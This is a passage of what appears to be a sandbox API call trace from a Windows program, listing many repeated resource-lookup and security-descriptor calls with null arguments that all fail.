returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.896] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.896] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.896] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.896] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.896] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.896] LockResource (hResData=0x0) returned 0x0 [0219.896] FreeResource (hResData=0x0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.897] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.897] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.897] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.897] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.897] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.897] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.897] LockResource (hResData=0x0) returned 0x0 [0219.897] FreeResource (hResData=0x0) returned 0 [0219.897] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.897] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.898] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.898] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.898] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.898] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.898] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.898] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.898] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.898] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.898] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.898] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.898] LockResource (hResData=0x0) returned 0x0 [0219.898] FreeResource (hResData=0x0) returned 0 [0219.899] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.899] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.899] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.899] FreeResource (hResData=0x0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.899] FreeResource (hResData=0x0) returned 0 [0219.899] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.899] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.899] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.899] FreeResource (hResData=0x0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.899] FreeResource (hResData=0x0) returned 0 [0219.899] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.899] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.899] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.899] FreeResource (hResData=0x0) returned 0 [0219.899] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.899] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.899] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.900] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.900] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.900] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.900] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.900] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.900] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.900] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.900] LockResource (hResData=0x0) returned 0x0 [0219.900] FreeResource (hResData=0x0) returned 0 [0219.900] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.900] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.901] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.901] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.901] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.901] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.901] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.901] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.901] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.901] FreeResource (hResData=0x0) returned 0 [0219.901] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.901] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.901] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.902] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.902] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.902] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.902] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.902] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.902] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.902] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.902] LockResource (hResData=0x0) returned 0x0 [0219.902] FreeResource (hResData=0x0) returned 0 [0219.902] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.903] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.903] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.903] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.903] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.903] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.903] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.903] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.903] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.903] LockResource (hResData=0x0) returned 0x0 [0219.903] FreeResource (hResData=0x0) returned 0 [0219.903] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.943] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.943] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource (hResData=0x0) returned 0 [0219.943] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.943] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.943] LockResource (hResData=0x0) returned 0x0 [0219.943] FreeResource 